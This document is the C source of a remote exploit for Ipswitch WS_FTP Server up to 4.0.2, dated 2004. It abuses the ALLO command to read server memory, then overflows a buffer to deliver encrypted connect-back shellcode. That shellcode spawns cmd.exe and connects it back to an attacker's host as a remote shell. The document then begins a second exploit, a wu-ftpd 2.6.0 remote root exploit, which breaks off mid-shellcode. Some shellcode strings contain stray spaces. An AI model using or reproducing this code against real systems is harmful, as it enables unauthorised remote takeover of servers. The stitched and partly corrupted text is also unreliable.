* (c)2004 Hugh Mann [email protected]
*
* This exploit has been tested with WS_FTP Server 4.0.2.EVAL, Windows XP SP1
*
* NOTE:
* - The exploit assumes the user has a total file size limit. If the user only has
* a max number of files limit you will need to rewrite parts of this exploit for
* it to work.
*/
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
const char* temp_file = "#t#t#t";
#define ALLO_STRING "ALLO 18446744073709551615"
/*
* Assume all addresses >= this address to be invalid addresses. If the exploit doesn't work,
* try changing it to a larger value, eg. 0x80000000 or 0xC0000000.
*/
const MAX_ADDR = 0x80000000;
/*
* Size of each thread's stack space. From iFtpSvc.exe PE header. Must be a power of 2.
* Should not be necessary to change this since practically all PE files use the default
* size (1MB).
*/
const SERV_STK_SIZE = 0x00100000;
/*
* This is the lower bits of ESP when the ALLO handler is called. This is very WS_FTP Server
* version dependent. Should be = ESP (mod SERV_STK_SIZE)
*/
const SERV_STK_OFFS = 0x0007F208;
/*
* This is the offset of the "this" pointer relative to SERV_STK_OFFS in the ALLO handler.
*/
const SERV_STK_THIS_OFFS = -(0x210+4); // EBP is saved
/*
* Offset of username relative to the "this" pointer
*/
const SERV_THIS_USERNAME_OFFS = 0x9F8;
/*
* Offset of FTP cmd buf relative to the "this" pointer
*/
const SERV_THIS_CMDBUF_OFFS = 0x1F8;
/*
* Offset of EIP relative to vulnerable buffer
*/
const SERV_BUF_EIP = 0x110;
/*
* Return addresses to JMP ESP instruction. Must contain bytes that are valid shellcode characters.
*/
#if 1
const char* ret_addr = "\xD3\xD9\xE2\x77"; // advapi32.dll (08/29/2002), WinXP SP1
#else
// mswsock.dll is not loaded by WS_FTP Server, and I haven't investigated which DLL actually loads it
// so I don't use this possibly better return address.
const char* ret_addr = "\x3D\x40\xA5\x71"; // mswsock.dll (08/23/2001), WinXP SP1 and probably WinXP too
#endif
#define MAXLINE 0x1000
static char inbuf[MAXLINE];
static unsigned inoffs = 0;
static char last_line[MAXLINE];
static int output_all = 0;
static int quite_you = 0;
void msg2(const char *format, ...)
{
va_list args;
va_start(args, format);
vfprintf(stdout, format, args);
}
void msg(const char *format, ...)
{
if (quite_you && output_all == 0)
return;
va_list args;
va_start(args, format);
vfprintf(stdout, format, args);
}
int isrd(SOCKET s)
{
fd_set r;
FD_ZERO(&r);
FD_SET(s, &r);
timeval t = {0, 0};
int ret = select(1, &r, NULL, NULL, &t);
if (ret < 0)
return 0;
else
return ret != 0;
}
void print_all(const char* buf, int len = -1)
{
if (len == -1)
len = (int)strlen(buf);
for (int i = 0; i < len; i++)
putc(buf[i], stdout);
}
int _recv(SOCKET s, char* buf, int len, int flags)
{
int ret = recv(s, buf, len, flags);
if (!output_all || ret < 0)
return ret;
print_all(buf, ret);
return ret;
}
int get_line(SOCKET s, char* string, unsigned len)
{
char* nl;
while ((nl = (char*)memchr(inbuf, '\n', inoffs)) == NULL)
{
if (inoffs >= sizeof(inbuf))
{
msg("[-] Too long line\n");
return 0;
}
int len = _recv(s, &inbuf[inoffs], sizeof(inbuf) - inoffs, 0);
if (len <= 0)
{
msg("[-] Error receiving data\n");
return 0;
}
inoffs += len;
}
strncpy(last_line, inbuf, sizeof(last_line));
last_line[sizeof(last_line)-1] = 0;
unsigned nlidx = (unsigned)(ULONG_PTR)(nl - inbuf);
if (nlidx >= len)
{
msg("[-] Too small caller buffer\n");
return 0;
}
memcpy(string, inbuf, nlidx);
string[nlidx] = 0;
if (nlidx > 0 && string[nlidx-1] == '\r')
string[nlidx-1] = 0;
if (nlidx + 1 >= inoffs)
inoffs = 0;
else
{
memcpy(inbuf, &inbuf[nlidx+1], inoffs - (nlidx + 1));
inoffs -= nlidx + 1;
}
return 1;
}
int ignorerd(SOCKET s)
{
inoffs = 0;
while (1)
{
if (!isrd(s))
return 1;
if (_recv(s, inbuf, sizeof(inbuf), 0) < 0)
return 0;
}
}
int get_reply_code(SOCKET s, int (*func)(void* data, char* line) = NULL, void* data = NULL)
{
char line[MAXLINE];
if (!get_line(s, line, sizeof(line)))
{
msg("[-] Could not get status code\n");
return -1;
}
if (func)
func(data, line);
char c = line[3];
line[3] = 0;
int code;
if (!(c == ' ' || c == '-') || strlen(line) != 3 || !(code = atoi(line)))
{
msg("[-] Weird reply\n");
return -1;
}
char endline[4];
memcpy(endline, line, 3);
endline[3] = ' ';
if (c == '-')
{
while (1)
{
if (!get_line(s, line, sizeof(line)))
{
msg("[-] Could not get next line\n");
return -1;
}
if (func)
func(data, line);
if (!memcmp(line, endline, sizeof(endline)))
break;
}
}
return code;
}
int sendb(SOCKET s, const char* buf, int len, int flags = 0)
{
while (len)
{
int l = send(s, buf, len, flags);
if (l <= 0)
break;
len -= l;
buf += l;
}
return len == 0;
}
int sends(SOCKET s, const char* buf, int flags = 0)
{
return sendb(s, buf, (int)strlen(buf), flags);
}
int _send_cmd(SOCKET s, const char* fmt, va_list args, int need_reply)
{
char buf[MAXLINE];
buf[sizeof(buf)-1] = 0;
if (_vsnprintf(buf, sizeof(buf), fmt, args) < 0 || buf[sizeof(buf)-1] != 0)
{
msg("[-] Buffer overflow\n");
return -1;
}
if (output_all)
print_all(buf);
if (!ignorerd(s) || !sends(s, buf))
return -1;
if (need_reply)
return get_reply_code(s);
return 0;
}
int send_cmd(SOCKET s, const char* fmt, ...)
{
va_list args;
va_start(args, fmt);
return _send_cmd(s, fmt, args, 1);
}
int send_cmd2(SOCKET s, const char* fmt, ...)
{
va_list args;
va_start(args, fmt);
return _send_cmd(s, fmt, args, 0);
}
int add_bytes(void* dst, int& dstoffs, int dstlen, const void* src, int srclen)
{
if (dstoffs < 0 || dstoffs + srclen > dstlen || dstoffs + srclen < dstoffs)
{
msg("[-] Buffer overflow ;)\n");
return 0;
}
memcpy((char*)dst+dstoffs, src, srclen);
dstoffs += srclen;
return 1;
}
int check_invd_bytes(const char* name, const void* buf, int buflen, int (*chkchar)(char c))
{
const char* b = (const char*)buf;
for (int i = 0; i < buflen; i++)
{
if (!chkchar(b[i]))
{
msg("[-] %s[%u] (%02X) is an invalid character\n", name, i, (unsigned char)b[i]);
return 0;
}
}
return 1;
}
int enc_byte(char& c, char& k, int (*chkchar)(char c))
{
for (int i = 0; i < 0x100; i++)
{
if (!chkchar(c ^ i) || !chkchar(i))
continue;
c ^= i;
k = i;
return 1;
}
msg("[-] Could not find encryption key for byte %02X\n", c);
return 0;
}
int get_enc_key(char* buf, int size, int offs, int step, int (*chkchar)(char c), int ignore1 = -1, int ignore2 = -1)
{
for (int i = 0; i < 0x100; i++)
{
if (!chkchar(i))
continue;
for (int j = offs; j < size; j += step)
{
if (ignore1 != -1 && (j >= ignore1 && j <= ignore2))
continue; // These bytes aren't encrypted
if (!chkchar(buf[j] ^ i))
break;
}
if (j < size)
continue;
return i;
}
msg("[-] Could not find an encryption key\n");
return -1;
}
int login(SOCKET s, const char* username, const char* userpass)
{
msg("[+] Logging in as %s...\n", username);
int code;
if ((code = send_cmd(s, "USER %s\r\n", username)) < 0)
{
msg("[-] Failed to log in #1\n");
return 0;
}
if (code == 331)
{
if ((code = send_cmd(s, "PASS %s\r\n", userpass)) < 0)
{
msg("[-] Failed to log in #2\n");
return 0;
}
}
if (code != 230)
{
msg("[-] Failed to log in. Code %3u\n", code);
return 0;
}
msg("[+] Logged in\n");
return 1;
}
class xuser
{
public:
xuser() : s(INVALID_SOCKET) {}
~xuser() {close();}
int init(unsigned long ip, unsigned short port, const char* username, const char* userpass);
void close() {if (s >= 0) closesocket(s); s = INVALID_SOCKET;}
SOCKET sock() const {return s;}
int exploit(unsigned long sip, unsigned short sport);
int read_serv_mem_bytes(unsigned addr, void* dst, int dstlen);
int read_serv_mem_string(unsigned addr, char* dst, int dstlen);
int read_serv_mem_uint32(unsigned addr, unsigned* dst);
protected:
int read_serv_mem(unsigned addr, void* dst, int dstlen);
SOCKET s;
char username[260];
char userpass[260];
unsigned long ip;
unsigned short port;
};
/*
* XAUT code tested with WS_FTP Server 4.0.2.EVAL
*/
#define XAUT_2_KEY 0x49327576
int xaut_encrypt(char* dst, const char* src, int len, unsigned long key)
{
unsigned char keybuf[0x80*4];
for (int i = 0; i < sizeof(keybuf)/4; i++)
{
keybuf[i*4+0] = (char)key;
keybuf[i*4+1] = (char)(key >> 8);
keybuf[i*4+2] = (char)(key >> 16);
keybuf[i*4+3] = (char)(key >> 24);
}
for (int i = 0; i < len; i++)
{
if (i >= sizeof(keybuf))
{
msg("[-] xaut_encrypt: Too long input buffer\n");
return 0;
}
*dst++ = *src++ ^ keybuf[i];
}
return 1;
}
char* xaut_unpack(char* src, int len, int delete_it)
{
char* dst = new char[len*2 + 1];
for (int i = 0; i < len; i++)
{
dst[i*2+0] = ((src[i] >> 4) & 0x0F) + 0x35;
dst[i*2+1] = (src[i] & 0x0F) + 0x31;
}
dst[i*2] = 0;
if (delete_it)
delete src;
return dst;
}
int xaut_login(SOCKET s, int d, const char* username, const char* password, unsigned long key)
{
msg("[+] Logging in [XAUT] as %s...\n", username);
int ret = 0;
char* dst = NULL;
__try
{
const char* middle = ":";
dst = new char[strlen(username) + strlen(middle) + strlen(password) + 1];
strcpy(dst, username);
strcat(dst, middle);
strcat(dst, password);
int len = (int)strlen(dst);
if ((d == 2 && !xaut_encrypt(dst, dst, len, XAUT_2_KEY)) || !xaut_encrypt(dst, dst, len, key))
__leave;
dst = xaut_unpack(dst, len, 1);
if (send_cmd(s, "XAUT %d %s\r\n", d, dst) != 230)
__leave;
ret = 1;
}
__finally
{
delete dst;
}
if (!ret)
msg("[-] Failed to log in\n");
else
msg("[+] Logged in\n");
return ret;
}
struct my_data
{
unsigned long key;
int done_that;
char hostname[256];
};
int line_callback(void* data, char* line)
{
my_data* m = (my_data*)data;
if (m->done_that)
return 1;
/*
* Looking for a line similar to:
*
* "220-FTP_HOSTNAME X2 WS_FTP Server 4.0.2.EVAL (41541732)\r\n"
*/
char* s, *e;
if (strncmp(line, "220", 3) || !strstr(line, "WS_FTP Server") ||
(s = strrchr(line, '(')) == NULL || (e = strchr(s, ')')) == NULL)
return 1;
char buf[0x10];
int len = (int)(ULONG_PTR)(e - (s+1));
if (len >= sizeof(buf) || len > 10)
return 1;
memcpy(buf, s+1, len);
buf[len] = 0;
for (int i = 0; i < len; i++)
{
if (!isdigit((unsigned char)buf[i]))
return 1;
}
m->key = atol(buf);
for (int i = 4, len = (int)strlen(line); i < len; i++)
{
if (i-4 >= sizeof(m->hostname))
return 1;
m->hostname[i-4] = line[i];
if (line[i] == ' ')
break;
}
m->hostname[i-4] = 0;
if (m->hostname[0] == 0)
return 1;
m->done_that = 1;
return 1;
}
int xuser::init(unsigned long _ip, unsigned short _port, const char* _username, const char* _userpass)
{
ip = _ip;
port = _port;
close();
strncpy(username, _username, sizeof(username));
if (username[sizeof(username)-1] != 0)
{
msg("[-] username too long\n");
return 0;
}
strncpy(userpass, _userpass, sizeof(userpass));
if (userpass[sizeof(userpass)-1] != 0)
{
msg("[-] userpass too long\n");
return 0;
}
sockaddr_in saddr;
memset(&saddr, 0, sizeof(saddr));
saddr.sin_family = AF_INET;
saddr.sin_port = htons(port);
saddr.sin_addr.s_addr = htonl(ip);
in_addr a; a.s_addr = htonl(ip);
msg("[+] Connecting to %s:%u...\n", inet_ntoa(a), port);
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (s < 0 || connect(s, (sockaddr*)&saddr, sizeof(saddr)) < 0)
{
msg("[-] Could not connect\n");
return 0;
}
msg("[+] Connected\n");
my_data m;
memset(&m, 0, sizeof(m));
int code = get_reply_code(s, line_callback, &m);
if (code != 220)
{
msg("[-] Got reply %3u\n", code);
return 0;
}
else if (!m.done_that)
{
msg("[-] Could not find XAUT key or host name => Not a WS_FTP Server\n");
return 0;
}
if (!xaut_login(s, 0, username, userpass, m.key) && !login(s, username, userpass))
return 0;
// Don't want UTF8 conversions
if (send_cmd(s, "LANG en\r\n") != 200)
{
msg("[-] Apparently they don't understand the english language\n");
return 0;
}
if (send_cmd(s, "NOOP step into the light\r\n") != 200)
{
msg("[-] C4n't k1ll 4 z0mbie\n");
return 0;
}
return 1;
}
SOCKET get_data_sock(SOCKET s, const char* filename, const char* cmd)
{
SOCKET sd = INVALID_SOCKET;
int error = 1;
__try
{
sockaddr_in saddr;
int len = sizeof(saddr);
if (getsockname(s, (sockaddr*)&saddr, &len) < 0 || len != sizeof(saddr) ||
(sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
__leave;
sockaddr_in daddr;
memset(&daddr, 0, sizeof(daddr));
daddr.sin_family = AF_INET;
daddr.sin_port = 0;
daddr.sin_addr.s_addr = saddr.sin_addr.s_addr;
len = sizeof(daddr);
if (bind(sd, (sockaddr*)&daddr, sizeof(daddr)) < 0 || listen(sd, 1) < 0 ||
getsockname(sd, (sockaddr*)&daddr, &len) < 0 || len != sizeof(daddr))
__leave;
unsigned long ip = ntohl(daddr.sin_addr.s_addr);
unsigned short port = ntohs(daddr.sin_port);
if (send_cmd(s, "PORT %u,%u,%u,%u,%u,%u\r\n",
(unsigned char)(ip >> 24),
(unsigned char)(ip >> 16),
(unsigned char)(ip >> 8),
(unsigned char)ip,
(unsigned char)(port >> 8),
(unsigned char)port) != 200)
__leave;
if (send_cmd2(s, "%s %s\r\n", cmd, filename) < 0)
__leave;
msg("[+] Waiting for server to connect...\n");
SOCKET sa;
sockaddr_in aaddr;
len = sizeof(aaddr);
if ((sa = accept(sd, (sockaddr*)&aaddr, &len)) < 0)
__leave;
closesocket(sd);
sd = sa;
if (get_reply_code(s) != 150)
__leave;
error = 0;
}
__finally
{
if (error)
{
msg("[-] Could not create data connection, %u\n", GetLastError());
closesocket(sd);
sd = INVALID_SOCKET;
}
else
msg("[+] Server connected\n");
}
return sd;
}
int create_file(SOCKET s, const char* tmpname, unsigned size = 1)
{
int ret = 0;
SOCKET sd = INVALID_SOCKET;
__try
{
if (size > 1 && send_cmd(s, "REST %u\r\n", size) != 350)
__leave;
if ((sd = get_data_sock(s, tmpname, "STOR")) < 0)
__leave;
ret = 1;
}
__finally
{
if (sd >= 0)
closesocket(sd);
}
if (ret && get_reply_code(s) != 226)
ret = 0;
return ret;
}
const unsigned int shlc2_offs_encstart = 0x0000002B;
const unsigned int shlc2_offs_encend = 0x000001B8;
const unsigned int shlc2_offs_enckey = 0x00000025;
unsigned char shlc2_code[] =
"\xEB\x16\x78\x56\x34\x12\x78\x56\x34\x12\x78\x56\x 34\x12\x78\x56"
"\x34\x12\x5B\x53\x83\xEB\x1D\xC3\xE8\xF5\xFF\xFF\x FF\x33\xC9\xB1"
"\x64\x81\x74\x8B\x27\x55\x55\x55\x55\xE2\xF6\xFC\x 8B\x43\x0A\x31"
"\x43\x02\x8B\x43\x0E\x31\x43\x06\x89\x4B\x0A\x89\x 4B\x0E\x64\x8B"
"\x35\x30\x00\x00\x00\x8B\x76\x0C\x8B\x76\x1C\xAD\x 8B\x68\x08\x8D"
"\x83\x67\x01\x00\x00\x55\xE8\xB7\x00\x00\x00\x68\x 33\x32\x00\x00"
"\x68\x77\x73\x32\x5F\x54\xFF\xD0\x96\x8D\x83\x74\x 01\x00\x00\x56"
"\xE8\x9D\x00\x00\x00\x81\xEC\x90\x01\x00\x00\x54\x 68\x01\x01\x00"
"\x00\xFF\xD0\x8D\x83\x7F\x01\x00\x00\x56\xE8\x83\x 00\x00\x00\x33"
"\xC9\x51\x51\x51\x6A\x06\x6A\x01\x6A\x02\xFF\xD0\x 97\x8D\x83\x8A"
"\x01\x00\x00\x56\xE8\x69\x00\x00\x00\x33\xC9\x51\x 51\x51\x51\x6A"
"\x10\x8D\x4B\x02\x51\x57\xFF\xD0\xB9\x54\x00\x00\x 00\x2B\xE1\x88"
"\x6C\x0C\xFF\xE2\xFA\xC6\x44\x24\x10\x44\x41\x88\x 4C\x24\x3C\x88"
"\x4C\x24\x3D\x89\x7C\x24\x48\x89\x7C\x24\x4C\x89\x 7C\x24\x50\x49"
"\x8D\x44\x24\x10\x54\x50\x51\x51\x51\x6A\x01\x51\x 51\x8D\x83\xA4"
"\x01\x00\x00\x50\x51\x8D\x83\x95\x01\x00\x00\x55\x E8\x11\x00\x00"
"\x00\x59\xFF\xD0\x8D\x83\xAC\x01\x00\x00\x55\xE8\x 02\x00\x00\x00"
"\xFF\xD0\x60\x8B\x7C\x24\x24\x8D\x6F\x78\x03\x6F\x 3C\x8B\x6D\x00"
"\x03\xEF\x83\xC9\xFF\x41\x3B\x4D\x18\x72\x0B\x64\x 89\x0D\x00\x00"
"\x00\x00\x8B\xE1\xFF\xE4\x8B\x5D\x20\x03\xDF\x8B\x 1C\x8B\x03\xDF"
"\x8B\x74\x24\x1C\xAC\x38\x03\x75\xDC\x43\x84\xC0\x 75\xF6\x8B\x5D"
"\x24\x03\xDF\x0F\xB7\x0C\x4B\x8B\x5D\x1C\x03\xDF\x 8B\x0C\x8B\x03"
"\xCF\x89\x4C\x24\x1C\x61\xC3\x4C\x6F\x61\x64\x4C\x 69\x62\x72\x61"
"\x72\x79\x41\x00\x57\x53\x41\x53\x74\x61\x72\x74\x 75\x70\x00\x57"
"\x53\x41\x53\x6F\x63\x6B\x65\x74\x41\x00\x57\x53\x 41\x43\x6F\x6E"
"\x6E\x65\x63\x74\x00\x43\x72\x65\x61\x74\x65\x50\x 72\x6F\x63\x65"
"\x73\x73\x41\x00\x63\x6D\x64\x2E\x65\x78\x65\x00\x 45\x78\x69\x74"
"\x50\x72\x6F\x63\x65\x73\x73\x00";
int is_valid_shlc2(char c)
{
return c != 0;
}
struct tfs_data
{
tfs_data() : tot_size(0), line(0), ok(0) {}
int line;
unsigned tot_size;
int ok;
};
int tfs_line_callback(void* data, char* line)
{
tfs_data* m = (tfs_data*)data;
if (++m->line != 1)
return 1;
if (strncmp(line, "250-", 4) ||
(m->tot_size = atoi(line+4)) == 0)
return 1;
m->ok = 1;
return 1;
}
int get_user_total_file_size(SOCKET s, unsigned& tot_size)
{
int ret = 0;
SOCKET sd = INVALID_SOCKET;
__try
{
/*
* Create a $message.txt file
*/
if ((sd = get_data_sock(s, "$message.txt", "STOR")) < 0 ||
send(sd, "%z", 2, 0) != 2)
__leave;
closesocket(sd);
sd = INVALID_SOCKET;
if (get_reply_code(s) != 226)
__leave;
tfs_data m;
const DWORD max_wait = 10000;
for (DWORD tc = GetTickCount(); GetTickCount() - tc < max_wait; )
{
if (send_cmd2(s, "CWD .\r\n") < 0)
__leave;
m.ok = m.line = 0;
int code = get_reply_code(s, tfs_line_callback, &m);
if (code != 500)
break;
}
if (!m.ok)
__leave;
tot_size = m.tot_size;
ret = 1;
}
__finally
{
if (sd >= 0)
closesocket(sd);
}
if (!ret)
msg("[-] Failed to get user total file size.\n Are you sure there's a total file size limit for this user?\n");
return ret;
}
int delete_file(SOCKET s, const char* filename)
{
DWORD tc = GetTickCount();
const DWORD wait = 10000;
while (1)
{
if (GetTickCount() - tc > wait)
return 0;
if (send_cmd(s, "STAT %s\r\n", filename) != 211)
return 1;
if (send_cmd(s, "DELE %s\r\n", filename) < 0)
return 0;
}
}
int create_file_for_addr(SOCKET s, unsigned addr)
{
int ret = 0;
__try
{
if (addr >= MAX_ADDR)
{
msg2("[-] Trying to read an addr (%08X) >= MAX_ADDR (%08X)\n", addr, MAX_ADDR);
__leave;
}
if (!delete_file(s, temp_file))
msg("[-] Could not delete file\n");
unsigned tot_size;
if (!get_user_total_file_size(s, tot_size))
__leave;
if (addr < tot_size)
{
msg2("[-] You must delete some user files to read address %08X\n", addr);
__leave;
}
unsigned size = addr - tot_size;
if (!create_file(s, temp_file, size))
__leave;
ret = 1;
}
__finally
{
}
return ret;
}
/*
* Returns < 0 => error
* Returns = 0 => server thread crashed
* Returns > 0 => read this many bytes into dst
*/
int xuser::read_serv_mem(unsigned addr, void* dst, int dstlen)
{
int file_created = 0;
int ret = -1;
__try
{
if (!create_file_for_addr(s, addr))
__leave;
file_created = 1;
if (send_cmd2(s, ALLO_STRING "\r\n") < 0)
__leave;
char buf[MAXLINE];
int bufsz = 0;
const char* m1 = "452 ";
int type = 0;
while (1)
{
if (bufsz >= sizeof(buf)-1)
__leave;
int size = _recv(s, &buf[bufsz], sizeof(buf)-1-bufsz, 0);
if (size < 0)
__leave;
if (size == 0)
{
if (bufsz == 0)
ret = 0;
__leave;
}
bufsz += size;
buf[bufsz] = 0;
if (bufsz >= (int)strlen(m1) && memcmp(m1, buf, strlen(m1)))
__leave; // Wrong reply code
const char* s1 = " files\r\n";
const char* s2 = " size\r\n";
if (bufsz >= (int)strlen(s1) && !memcmp(s1, &buf[bufsz-strlen(s1)], strlen(s1)))
{
type = 0;
break;
}
if (bufsz >= (int)strlen(s2) && !memcmp(s2, &buf[bufsz-strlen(s2)], strlen(s2)))
{
type = 1;
break;
}
}
const char* s = "quota exceeded; ";
const char* f1 = " size; ";
const char* f2 = " size\r\n";
const char* f3 = " files; ";
char* b = buf + strlen(m1);
if (strncmp(b, s, strlen(s)))
__leave;
char* ss = NULL, *se = NULL;
if (type == 0) // "quota exceeded; %s size; %u files\r\n"
{
ss = b + strlen(s);
for (int i = bufsz-(int)strlen(f1); ; i--)
{
if (i < 0)
__leave;
if (strncmp(f1, &buf[i], strlen(f1)))
continue; // Not equal to " size; "
se = &buf[i];
break;
}
}
else // "quota exceeded; %u files; %s size\r\n"
{
ss = strstr(buf, f3);
if (!ss)
__leave;
ss += strlen(f3);
se = &buf[bufsz-strlen(f2)];
}
if (!se || !ss || se < ss)
{
msg("[-] Buggy code\n");
__leave;
}
*se = 0;
int rd_size = (int)(UINT_PTR)(se - ss) + 1; // One 00h byte
ret = min((int)dstlen, rd_size);
memcpy(dst, ss, ret);
}
__finally
{
}
if (ret < 0)
msg("[-] Could not read server memory\n");
else if (ret == 0)
{
// Server thread crashed
if (!init(ip, port, username, userpass))
ret = -1;
}
return ret;
}
int xuser::read_serv_mem_bytes(unsigned addr, void* dst, int dstlen)
{
for (int i = 0; i < (int)dstlen; )
{
int len = read_serv_mem(addr+i, (char*)dst+i, dstlen-i);
if (len <= 0)
return len;
i += len;
}
return dstlen;
}
int xuser::read_serv_mem_string(unsigned addr, char* dst, int dstlen)
{
int len = read_serv_mem(addr, dst, dstlen);
if (len <= 0)
return len;
if (dst[len-1] != 0)
return -1;
return len;
}
int xuser::read_serv_mem_uint32(unsigned addr, unsigned* dst)
{
unsigned char tmp[4];
int ret = read_serv_mem_bytes(addr, tmp, sizeof(tmp));
if (ret <= 0)
return ret;
if (ret != sizeof(tmp))
return -1;
*dst = (tmp[3] << 24) | (tmp[2] << 16) | (tmp[1] << 8) | tmp[0];
return ret;
}
int xuser::exploit(unsigned long sip, unsigned short sport)
{
int ret = 0;
char* shellcode = NULL;
char* badbuf = NULL;
__try
{
/*
* Encrypt the shellcode
*/
const shellcode_len = sizeof(shlc2_code)-1;
shellcode = new char[shellcode_len+1];
memcpy(shellcode, shlc2_code, shellcode_len);
shellcode[shellcode_len] = 0;
shellcode[2] = (char)2;
shellcode[3] = (char)(2 >> 8);
shellcode[4] = (char)(sport >> 8);
shellcode[5] = (char)sport;
shellcode[6] = (char)(sip >> 24);
shellcode[7] = (char)(sip >> 16);
shellcode[8] = (char)(sip >> 8);
shellcode[9] = (char)sip;
for (int i = 0; i < 8; i++)
{
if (!enc_byte(shellcode[2+i], shellcode[2+8+i], is_valid_shlc2))
__leave;
}
for (int i = 0; i < 4; i++)
{
int k = get_enc_key(&shellcode[shlc2_offs_encstart], shlc2_offs_encend-shlc2_offs_encstart, i, 4, is_valid_shlc2);
if (k < 0)
__leave;
shellcode[shlc2_offs_enckey+i] = k;
}
msg("[+] Shellcode encryption key = %02X%02X%02X%02X\n",
(unsigned char)shellcode[shlc2_offs_enckey+3],
(unsigned char)shellcode[shlc2_offs_enckey+2],
(unsigned char)shellcode[shlc2_offs_enckey+1],
(unsigned char)shellcode[shlc2_offs_enckey]);
for (int i = 0; i < shlc2_offs_encend-shlc2_offs_encstart; i++)
shellcode[shlc2_offs_encstart+i] ^= shellcode[shlc2_offs_enckey + i % 4];
/*
* Do some sanity checks
*/
if (!check_invd_bytes("shellcode", shellcode, shellcode_len, is_valid_shlc2) ||
!check_invd_bytes("ret_addr", ret_addr, 4, is_valid_shlc2))
__leave;
if (!delete_file(s, temp_file))
{
msg("Could not delete file\n");
__leave;
}
unsigned tot_size;
if (!get_user_total_file_size(s, tot_size))
__leave;
msg("[+] Scanning server memory: ");
quite_you = 1;
const unsigned ADDR_START = SERV_STK_SIZE;
const unsigned ADDR_END = MAX_ADDR-1;
unsigned this_ptr;
for (unsigned addr = ADDR_START; ; addr += SERV_STK_SIZE)
{
if (addr > ADDR_END || !addr)
{
/*
* Can happen if the address of the thread's stack is not in the same position in
* memory. This most likely happens when another user logged in or it sent a FTP
* command which creates a new server thread. Try again.
*/
msg2("[-] Could not find the this ptr. Try again.\n");
__leave;
}
int rc = read_serv_mem_uint32(addr + SERV_STK_OFFS + SERV_STK_THIS_OFFS, &this_ptr);
if (rc < 0)
{
msg2("- unknown error\n"); // Error
__leave;
}
else if (rc == 0)
{
msg2("x"); // Crashed
}
else
{
msg2("."); // Bingo
char tmp[0x200];
if (this_ptr + SERV_THIS_USERNAME_OFFS < MAX_ADDR && this_ptr + SERV_THIS_CMDBUF_OFFS < MAX_ADDR &&
read_serv_mem_string(this_ptr + SERV_THIS_USERNAME_OFFS, tmp, sizeof(tmp)) > 0 &&
!strcmp(tmp, username) &&
read_serv_mem_string(this_ptr + SERV_THIS_CMDBUF_OFFS, tmp, sizeof(tmp)) > 0 &&
!strcmp(tmp, ALLO_STRING))
break;
}
}
quite_you = 0;
msg("\n[+] this = %08X\n", this_ptr);
const char* s1 = "quota exceeded; ";
char padding[SERV_BUF_EIP];
int padding_len = sizeof(padding) - (int)strlen(s1);
memset(padding, 'A', sizeof(padding));
int xpsz = (int)strlen(ALLO_STRING "\r\n") + padding_len + 4 + shellcode_len;
badbuf = new char[xpsz+1];
badbuf[xpsz] = 0;
int tmpidx = 0;
if (!add_bytes(badbuf, tmpidx, xpsz, ALLO_STRING "\r\n", (int)strlen(ALLO_STRING "\r\n")) ||
!add_bytes(badbuf, tmpidx, xpsz, padding, padding_len) ||
!add_bytes(badbuf, tmpidx, xpsz, ret_addr, 4) ||
!add_bytes(badbuf, tmpidx, xpsz, shellcode, shellcode_len) ||
tmpidx != xpsz)
{
msg("[-] This is a bug. Now you know\n");
__leave;
}
if (!create_file_for_addr(s, this_ptr + SERV_THIS_CMDBUF_OFFS + strlen(ALLO_STRING "\r\n")))
__leave;
if (send_cmd2(s, badbuf) < 0)
__leave;
ret = 1;
}
__finally
{
quite_you = 0;
if (shellcode)
delete shellcode;
if (badbuf)
delete badbuf;
}
return ret;
}
void show_help(char* pname)
{
msg("%s <ip> <port> <sip> <sport> [-u username] [-p userpass] [-a]\n", pname);
exit(1);
}
int main(int argc, char** argv)
{
msg("Ipswitch WS_FTP Server <= 4.0.2 ALLO exploit\n");
msg("(c)2004 Hugh Mann [email protected]\n");
WSADATA wsa;
if (WSAStartup(0x0202, &wsa))
return 1;
if (argc < 5)
show_help(argv[0]);
unsigned long ip = ntohl(inet_addr(argv[1]));
unsigned short port = (unsigned short)atoi(argv[2]);
unsigned long sip = ntohl(inet_addr(argv[3]));
unsigned short sport = (unsigned short)atoi(argv[4]);
const char* username = "anonymous";
const char* userpass = "Hugh Mann";
for (int i = 5; i < argc; i++)
{
if (!strcmp(argv[i], "-u") && i + 1 < argc)
{
username = argv[++i];
}
else if (!strcmp(argv[i], "-p") && i + 1 < argc)
{
userpass = argv[++i];
}
else if (!strcmp(argv[i], "-a"))
{
output_all = 1;
}
else
show_help(argv[0]);
}
if (!ip || !port || !sip || !sport)
show_help(argv[0]);
xuser user;
if (!user.init(ip, port, username, userpass))
return 0;
if (!user.exploit(sip, sport))
msg("[-] u n33d t0 s7uddy m0r3...\n");
else
msg("[+] Wait a few secs for a shell\n");
return 0;
}
// [2004-03-23]
21 wu-ftpd 2.6.0 Remote Root Exploit
/*
* (c) 2000 venglin / b0f
* http://b0f.freebsd.lublin.pl
*
* WUFTPD 2.6.0 REMOTE ROOT EXPLOIT (22/06/2000, updated: 05/08/2000)
*
* Idea and preliminary version of exploit by tf8
*
* Greetz: Lam3rZ, TESO, ADM, lcamtuf, karpio.
* Dedicated to ksm.
*
* **PRIVATE**DO*NOT*DISTRIBUTE**
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <arpa/inet.h>
#define repln if (getreply(0) < 0) return -1
#define replv if (getreply(1) < 0) return -1
#ifdef DEBUG
#define repl replv
#else
#define repl repln
#endif
char usage[] = "usage: bobek [-l login] [-o port] [-f retofs] [-s retlocofs]\n\t<-t type> <hostname>";
char recvbuf[BUFSIZ], sendbuf[BUFSIZ];
FILE *cin, *cout;
char linuxcode[]= /* Lam3rZ chroot() code */
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x 31\xdb"
"\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\x c0\x31"
"\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\x01\xb0\x 27\xcd"
"\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x 31\xdb"
"\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x 8d\x5e"
"\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x 46\x09"
